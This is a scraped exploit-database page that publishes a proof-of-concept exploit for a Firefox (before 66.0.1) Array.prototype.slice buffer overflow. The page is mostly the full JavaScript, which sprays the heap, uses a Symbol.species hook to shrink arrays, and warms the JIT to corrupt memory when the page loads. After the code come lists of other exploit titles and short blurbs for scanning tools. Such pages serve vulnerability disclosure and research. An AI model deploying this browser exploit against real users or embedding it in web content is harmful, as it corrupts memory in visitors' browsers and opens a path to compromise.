Menu

Search for hundreds of thousands of exploits

"Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow"

Author

Exploit author

xuechiyaobai

Platform

Exploit platform

multiple

Release date

Exploit published date

2019-03-26

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
<script>

let size = 64;

garr = [];
j = 0;
function gc(){
	var tmp = [];
	for(let i = 0;i < 0x20000;i++){
		tmp[i] = new Uint32Array(size * 2);
		for(let j = 0;j < (size*2);j+=2){
			tmp[i][j] = 0x12345678;
			tmp[i][j+1] = 0xfffe0123;
		}
	}
	garr[j++] = tmp;
}

let arr = [{},2.2];

let obj = {};

obj[Symbol.species] = function(){
	victim.length = 0x0;
	for(let i = 0;i < 0x2000;i++){
		gvictim[i].length = 0x0;
		gvictim[i] = null;
	}
	gc();
	//Array.isArray(garr[0][0x10000]);
	return [1.1];
}

let gvictim = [];

for(let i = 0;i < 0x1000;i++){
	gvictim[i] = [1.1,2.2];
	gvictim[i].length = size;
	gvictim[i].fill(3.3);
}

let victim = [1.1,2.2];
victim.length = size;
victim.fill(3.3);

for(let i = 0x1000;i < 0x2000;i++){
	gvictim[i] = [1.1,2.2];
	gvictim[i].length = size;
	gvictim[i].fill(3.3);
}

function fake(arg){
}
for(let i = 0;i < size;i++){
	fake["x"+i.toString()] = 2.2;
}

function jit(){
	victim[1] = 1.1;
	arr.slice();
	//fake.x2 = 6.17651672645e-312;
	return victim[2];
}

flag = 0;


for(let i = 0;i < 0x10000;i++){
	xx = jit();
}

arr.constructor = obj;

Array.isArray(victim);
alert(333);
alert(jit());
</script>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2019-03-26 "Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow" dos multiple xuechiyaobai 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected